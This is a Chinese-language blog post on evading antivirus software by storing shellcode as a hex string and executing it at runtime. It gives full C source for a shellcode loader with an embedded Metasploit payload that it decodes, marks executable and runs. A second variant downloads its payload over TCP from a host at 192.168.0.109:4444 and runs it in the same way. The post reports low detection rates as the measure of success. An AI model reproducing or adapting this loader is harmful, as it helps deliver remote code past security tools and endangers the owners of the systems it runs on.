idiotc4t's blog
搜索文档…
基于HEX字符串执行的AV绕过
hex-strings-execute

开源项目改造->内嵌shellcode

我们采用@DimopoulosEliaSimpleShellcodeInject项目进行一些自定义改造,核心代码如下。
1
for(unsigned int i = 0; i< iterations-1; i++) {//读入HEX字符串转换成shellcode
2
sscanf(shellcode+2*i, "%2X", &char_in_hex);
3
shellcode[i] = (char)char_in_hex;
4
}
Copied!
由于该项目采用命令行传参,在实际使用过程中可能不太方便,我们对其进行一个内嵌HEX字符串的操作。
1
// windows/messagebox - 272 bytes
2
// https://metasploit.com/
3
// VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
4
// TITLE=MessageBox, TEXT=Hello, from MSF!, ICON=NO
5
d9eb9bd97424f431d2b27731c9648b71308b760c8b761c8b46088b7e208b36384f1875f35901d1ffe1608b6c24248b453c8b54287801ea8b4a188b5a2001ebe334498b348b01ee31ff31c0fcac84c07407c1cf0d01c7ebf43b7c242875e18b5a2401eb668b0c4b8b5a1c01eb8b048b01e88944241c61c3b20829d489e589c2688e4e0eec52e89fffffff894504bb7ed8e273871c2452e88effffff894508686c6c20416833322e64687573657230db885c240a89e656ff550489c250bba8a24dbc871c2452e85fffffff686f7858206861676542684d65737331db885c240a89e36858202020684d53462168726f6d20686f2c20666848656c6c31c9884c241089e131d252535152ffd031c050ff5508
6
Copied!
SimpleShellcodeInjector.c
1
#include <stdio.h>
2
#include <Windows.h>
3
char shellcode[] = "d9eb9bd97424f431d2b27731c9648b71308b760c8b761c8b46088b7e208b36384f1875f35901d1ffe1608b6c24248b453c8b54287801ea8b4a188b5a2001ebe334498b348b01ee31ff31c0fcac84c07407c1cf0d01c7ebf43b7c242875e18b5a2401eb668b0c4b8b5a1c01eb8b048b01e88944241c61c3b20829d489e589c2688e4e0eec52e89fffffff894504bb7ed8e273871c2452e88effffff894508686c6c20416833322e64687573657230db885c240a89e656ff550489c250bba8a24dbc871c2452e85fffffff686f7858206861676542684d65737331db885c240a89e36858202020684d53462168726f6d20686f2c20666848656c6c31c9884c241089e131d252535152ffd031c050ff5508";
4
int main(int argc, char* argv[]) {
5
6
unsigned int char_in_hex;
7
8
9
// char* shellcode = argv[1];//从参数读取HEX字符串
10
unsigned int iterations = strlen(shellcode);
11
12
13
unsigned int memory_allocation = strlen(shellcode) / 2;
14
15
VirtualProtect(shellcode, memory_allocation, PAGE_READWRITE, 0);
16
//由于字符串编译后默认写入不可写的PE段,所以需要修改内存属性
17
18
for (unsigned int i = 0; i < iterations / 2; i++) { //减小开销
19
sscanf_s(shellcode + 2 * i, "%2X", &char_in_hex);
20
shellcode[i] = (char)char_in_hex;
21
}
22
23
24
void* exec = VirtualAlloc(0, memory_allocation, MEM_COMMIT, PAGE_READWRITE);
25
memcpy(exec, shellcode, memory_allocation);
26
DWORD ignore;
27
VirtualProtect(exec, memory_allocation, PAGE_EXECUTE, &ignore);
28
29
(*(void (*)()) exec)();
30
31
return 0;
32
}
Copied!
  • 未加密payload检出率:12%

开源项目改造->网络分离免杀

由于内嵌payload,可能会被部分杀软标记特征码,这里给这个开源项目加入网络传递payload功能,代码如下。
1
#include <Windows.h>
2
DWORD RecvData(char** DataBuffer);
Copied!
1
#include <stdio.h>
2
#include <Windows.h>
3
#include "sockets.h"
4
5
6
int main(int argc, char* argv[]) {
7
unsigned int char_in_hex;
8
LPSTR shellcode = NULL;
9
// char* shellcode = argv[1];//从参数读取HEX字符串
10
unsigned int iterations = RecvData(&shellcode);
11
12
13
unsigned int memory_allocation = iterations / 2;
14
15
16
for (unsigned int i = 0; i < iterations / 2; i++) { //减小开销
17
sscanf_s(shellcode + 2 * i, "%2X", &char_in_hex);
18
shellcode[i] = (char)char_in_hex;
19
}
20
21
22
void* exec = VirtualAlloc(0, memory_allocation, MEM_COMMIT, PAGE_READWRITE);
23
memcpy(exec, shellcode, memory_allocation);
24
DWORD ignore;
25
VirtualProtect(exec, memory_allocation, PAGE_EXECUTE, &ignore);
26
27
(*(void (*)()) exec)();
28
29
return 0;
30
}
Copied!
1
#include <WinSock2.h>
2
#include <WS2tcpip.h>
3
#include <stdio.h>
4
#pragma comment(lib, "ws2_32.lib")
5
#pragma warning(disable : 4996)
6
7
DWORD RecvData(char** DataBuffer) {
8
WSADATA wsaData;
9
WSAStartup(MAKEWORD(2, 2), &wsaData);
10
SOCKET ConnectSocket;
11
ConnectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
12
sockaddr_in clientService;
13
clientService.sin_family = AF_INET;
14
clientService.sin_addr.s_addr = inet_addr("192.168.0.109");
15
clientService.sin_port = htons(4444);
16
int iResult = 0;
17
INT OnceRecvBytes = 0;
18
INT RecvBytes = 0;
19
struct timeval timeout = { 3,0 };
20
int ret = setsockopt(ConnectSocket, SOL_SOCKET, SO_RCVTIMEO, (const char*)&timeout, sizeof(timeout));
21
char* bufferReceivedBytes = new char[2000000];
22
23
do
24
{
25
iResult = connect(ConnectSocket, (SOCKADDR*)&clientService, sizeof(clientService));
26
Sleep(5);
27
28
} while (iResult == SOCKET_ERROR);
29
30
31
RecvBytes = recv(ConnectSocket, bufferReceivedBytes, 4096, NULL);
32
33
34
iResult = closesocket(ConnectSocket);
35
*DataBuffer = bufferReceivedBytes;
36
return RecvBytes;
37
};
38
Copied!
  • 分离免杀检出率:8%

LINKS

GitHub - DimopoulosElias/SimpleShellcodeInjector: SimpleShellcodeInjector receives as an argument a shellcode in hex and executes it. It DOES NOT inject the shellcode in a third party application.
GitHub
最近更新 1yr ago